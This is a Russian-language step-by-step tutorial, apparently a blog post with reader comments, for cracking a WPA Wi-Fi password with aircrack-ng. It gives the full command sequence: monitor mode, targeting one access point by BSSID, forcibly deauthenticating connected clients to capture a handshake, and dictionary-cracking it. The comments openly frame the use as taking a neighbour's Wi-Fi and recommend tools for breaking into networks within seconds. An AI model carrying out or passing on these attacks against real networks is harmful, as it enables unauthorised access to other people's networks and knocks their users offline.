Шаг 1 Определяем интерфейсДля начала нужно узнать, какой сетевой интерфейс нам нужен, для этого вводим команду:$ ifconfigПолучаем ответ:eth0 no wireless extensions.wlan0 IEEE 802.11abgn ESSID:off/anyMode:Managed Access Point: Not-Associated Tx-Power=15 dBmRetry short limit:7 RTS thr:off Fragment thr:offEncryption key:offPower Management:offВ моем случае всего три интерфейса, два из которых не имеют беспроводных расширений (no wireless extensions). Поэтому нас интересует только wlan0. Шаг 2 Переводим сетевой адаптер в режим мониторингаПеревод сетевого адаптера в режим мониторинга позволит нам видеть беспроводной трафик, подходящий рядом с нами. Для того чтобы сделать это, вводим команду:$ airmon-ng start wlan0Обратите внимание, что airmon-ng переименовал ваш интерфейс (у меня он стал называться mon0, но вам, все же, стоит проверить). Шаг 3 Перехватываем трафикТеперь, когда наш сетевой адаптер находится в режиме мониторинга, мы можем захватить, подходящий мимо нас трафик, используя команду airodump-ng. Вводим:$ airodump-ng mon0Обратите внимание, что все видимые точки доступа перечислены в верхней части экрана, а клиенты — в нижней части экрана. Шаг 4 Концентрируем перехват на конкретной точке доступаНаш следующий шаг — сосредоточить наши усилия на одной из точек доступа и на ее канале. Нас интересует BSSID и номер канала точки доступа, которую мы будем взламывать. Давайте откроем еще один терминал и введем:$ airodump-ng --bssid 08:86:30:74:22:76 -c 6 -w WPAcrack mon008:86:30:74:22:76 BSSID точки доступа-c 6 канал на котором работает точка доступа Wi-FiWPAcrack файл в который запишется handshakemon0 сетевой адаптер в режиме мониторингаМы сейчас концентрируемся на захвате данных с одной точки доступа с ESSID Belkin276 на канале 6. Терминал оставляем открытым! Шаг 5 Получение handshakeЧтобы захватить зашифрованный пароль, нам нужно, чтобы клиент прошел аутентификацию (подключился к Wi-Fi). Если он уже аутентифицирован, мы можем его деаутентифицировать (отключить), тогда система автоматически повторно аутентифицируется (подключится), в результате чего мы можем получить зашифрованный пароль.То есть нам просто нужно отключить подключенных пользователей, чтобы они подключились снова. Для этого открываем ещё один терминал и вводим:$ aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0100 количество пользователей, которые будут деаутентифицированы08:86:30:74:22:76 BSSID точки доступаmon0 сетевой адаптерТеперь при повторном подключении окно которое мы оставили на предыдущем шаге поймает handshake. Давайте вернемся к нашему терминалу airodump-ng и посмотрим.Обратите внимание на верхнюю строку справа, airodump-ng вывел: «Handshake WPA». То есть, мы успешно захватили зашифрованный пароль! Это первый шаг к успеху! Конец он же Шаг 6 Подбираем парольТеперь, когда у нас есть зашифрованный пароль в нашем файле WPAcrack, мы можем запустить подбор пароля. Но для этого нам нужно иметь список с паролями которые мы хотим использовать. Найти такой список можно за 5 минут в Гугле. Я, же, буду использовать список паролей по умолчанию, включенный в aircrack-ng: BackTrack darkcOde.Открываем новый терминал и вводим$ aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0deWPAcrack-01.cap файл в который мы записывали handshake (airodump-ng приписал в конце -01.cap)/pentest/passwords/wordlist/darkc0de абсолютный путь к списку паролей Видео
угум, только в реальных ситуациях, когда действительно нужно "одолжить" соседский wi-fi, обычный словарь вам не поможет
**** это долго, или как повезет. Можно по wps попробовать куда быстрее, но шанс маленький что такие сети среди доступных и уязвымых окажутся.
Скачай Router scan - у меня бабушка еще сетки ломала лет 5 назад - вскрывает на изи - Америку открыл делов максимум 20 секунд - сетку окткрыть новую с паролем.